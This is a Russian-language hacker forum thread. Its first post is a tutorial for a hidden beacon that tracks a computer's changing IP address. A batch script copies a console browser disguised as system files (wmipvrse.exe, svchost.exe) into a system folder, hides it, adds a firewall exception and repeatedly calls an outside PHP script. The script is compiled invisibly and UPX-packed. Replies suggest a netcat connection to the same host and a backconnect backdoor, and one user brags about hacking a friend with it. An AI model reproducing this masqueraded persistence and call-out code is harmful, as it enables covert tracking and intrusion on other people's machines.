![]() |
В очередной раз хочу поделиться с Вами решением очень частой проблемы. Данная проблема заключается в том, чтобы узнать ИП - адрес компьютера/дедика. Нет, не просто узнать, а узнавать и иметь над этим контроль постоянно. То есть, грубо говоря, будем писать обход смены динамических IP - адресов. Как ни странно, но мы снова будем использовать связку PHP + BAT. Ну вот нехочется мне заводить таких гигантов ЯП как C или Delphi, когда можно ограничиться небольшим. Да и интереснее .
К делу. Сначала принцип: Работа основана на том, что после запуска какой-то софтины, она будет стучать нам на наш скрипт PHP через HTTP, а мы ловить этот IP-адрес. Решение: Сначала необходимо продумать чем мы будет обращатся к нашему скрипту по HTTP. Можно было бы воспользоваться телнетом, но с телнет-батниками много геморроя, так как телнет не приучен хавать команды из *.bat или *.cmd скриптов. Тогда мы идем к дяде Google и вежливо его спрашиваем: "Консольный браузер для виндовс". Нам так же вежливо отвечают - "Есть такой, Links называется.". Значит качаем данный браузер и пугаемся - целых 2.5 мегабайта. Но это впринципе не беда. Почему? Потому что при создании из батника нашей "звонилки" будет проход через UPX, а это значит, что размер должен быть порядочно сжат. Теперь надо научиться с ним работать. Это оказалось очень легко, так как заход на определенный адрес идет в очень простом синтаксисе, а именно: Код:
links.exe http://google.comСоздание такого файла является простым - достаточно создать лоадер браузера: Код:
"%CD%\wmiprvse.exe" %1Теперь, создадим саму стучалку: Код:
copy "%CD%\wmipvrse.exe" "%SYSTEMROOT%\Debug\wmipvrse.exe" /yсперва мы скопируем сам браузер в системную папочку, далее сделаем ее системно-скрытой, добавим браузер в исключения файрволла, а потом по кругу, с паузой в 10 секунд (обеспечивает проверка пинга), вызываем наш браузер, и тут же его убиваем (перед следующим запуском, то есть у нас есть 10 секунд, чтобы достучатся до нашего скрипта). Тем самым, у нас есть два файла - браузер & батник, обеспечивающий его работу. Теперь вооружимся компилятором бат-файлов (его можно найти здесь - /thread175086.html) и компилируем данный скрипт, с параметрами: Код:
- Invisible applicationКод:
svchost.exe http://lovim-ip.ru/ip.phpPHP код:
Браузер "Links" (собранный в один файл и не собранный) - Links.zip Готовая "звонилка" - Svchost.exe (запуск: svchost.exe http://adres-php-skripta.com/skript.php) |
Не проще залить бекдор с бекконектом?
Чем браузеры всякие качать на машину? |
согласен, что это быстрее. но так как процент бекдоров с бекконнектом очень мал, и я не хотел инфицировать машину, а решить конкретно эту проблему - это выход.
|
Цитата:
Цитата:
|
Можно было бы использовать вместо браузера netcat. Главный плюс - он весит всего 60кб, а в качестве флага исп-ть конект на порт 8888.
Код:
nc.exe lovim-ip.ru 8888Код:
#!/usr/bin/perl |
Цитата:
|
отличная статья.
друга только что им ломанул |
Цитата:
|
Цитата:
|
Мне тоже! Сорцы так просто не достать!